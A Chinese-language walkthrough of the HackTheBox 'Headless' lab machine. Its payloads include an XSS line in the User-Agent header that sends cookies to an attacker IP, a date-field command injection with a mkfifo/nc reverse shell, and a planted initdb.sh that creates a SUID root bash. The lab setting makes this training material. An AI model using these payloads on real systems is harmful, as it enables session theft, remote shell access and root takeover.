打靶记录(一二一)之HTBHeadLess

端口扫描

┌──(mikannse㉿kali)-[~/HTB/headless]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 21:08 CST
Warning: 10.10.11.8 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.8
Host is up (0.088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds

┌──(mikannse㉿kali)-[~/HTB/headless]
└─$ sudo nmap -sT -sV -sC -O -p22,5000 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 21:09 CST
Nmap scan report for 10.10.11.8
Host is up (0.062s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.2.2 Python/3.11.2
|     Date: Mon, 02 Sep 2024 12:59:13 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2799
|     Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Under Construction</title>
|     <style>
|     body {
|     font-family: 'Arial', sans-serif;
|     background-color: #f7f7f7;
|     margin: 0;
|     padding: 0;
|     display: flex;
|     justify-content: center;
|     align-items: center;
|     height: 100vh;
|     .container {
|     text-align: center;
|     background-color: #fff;
|     border-radius: 10px;
|     box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
|   RTSPRequest: 
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following 
<snip>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.92 seconds

Web

5000端口上有一个python服务，进去之后有一个/support的路由，可以填表，没有其他的利用点，发现还有一个is_admin的cookie，盲猜是XSS来劫持cookies了,开启一个XSS-steal.py

当输入以下payload的时候发现被监测到了，也许得做一些混淆

<script>new Image().src="http://ip:8888/?"+document.cookie;</script>

于是我尝试了

<sscriptcript>var i=new Image;i.src="http://10.10.14.11:8888/?"+document.cookie;</sscriptcript>

这次绕过了WAF但是并没有被触发的样子,回到监测页面，我们的请求参数被列了出来，尝试更改User-agent 为payload

POST /support HTTP/1.1

Host: 10.10.11.8:5000

User-Agent: <script>new Image().src="http://vpnip:8888/?"+document.cookie;</script>

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 79

Origin: http://10.10.11.8:5000

Connection: keep-alive

Referer: http://10.10.11.8:5000/support

Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs

Upgrade-Insecure-Requests: 1



fname=one&lname=one&email=114514%40gmail.com&phone=1414141&message=%3Cscript%3E

成功劫持到cookies,第二条是admin的cookies,更改完发现没有卵用，也许后台要自己爆破

┌──(mikannse㉿kali)-[~/tools/web]
└─$ python2 XSS-cookie-stealer.py
Started http server

2024-09-02 09:48 PM - 10.10.14.11       Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
------------------------------------------------------------------------------------------------------------------
is_admin                        ['InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs']

2024-09-02 09:48 PM - 10.10.11.8        Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
------------------------------------------------------------------------------------------------------------------
is_admin                        ['ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0']

扫一下目录，出来个/dashboard,访问后可以生成什么东西，这种东西一眼顶针是命令拼接执行

POST /dashboard HTTP/1.1

Host: 10.10.11.8:5000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 22

Origin: http://10.10.11.8:5000

Connection: keep-alive

Referer: http://10.10.11.8:5000/dashboard

Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

Upgrade-Insecure-Requests: 1



date=2023-09-15;whoami

现在是dvir身份,将以下payload进行url编码发包反弹shell,成功

2023-09-15;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc vpnip 443 >/tmp/f

提权

有一个sudo命令

dvir@headless:~$ sudo -l
sudo -l
Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck

cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
  exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null
else
  /usr/bin/echo "Database service is running."
fi

exit 0

稍微分析一下这个bash脚本，令人感兴趣的地方是在

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
  /usr/bin/echo "Database service is not running. Starting it..."
  ./initdb.sh 2>/dev/null

如果进程列表上没有一个叫做initdb.sh的进行，那么输出一段文字并且执行当前目录下的inittdb.sh,那么能够自己写一个脚本

dvir@headless:/tmp$ cd /tmp
cd /tmp
dvir@headless:/tmp$ echo -e '#!/bin/bash\ncp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash' > /tmp/initdb.sh
<oot_bash;chmod +xs /tmp/root_bash' > /tmp/initdb.sh
dvir@headless:/tmp$ chmod +x /tmp/initdb.sh
chmod +x /tmp/initdb.sh
dvir@headless:/tmp$ sudo /usr/bin/syscheck

dvir@headless:/tmp$ ./root_bash -p
./root_bash -p
root_bash-5.2# whoami
whoami
root

碎碎念

XSS那里没想到用请求头来触发而往混淆那边想了卡了一下，还是不错的房间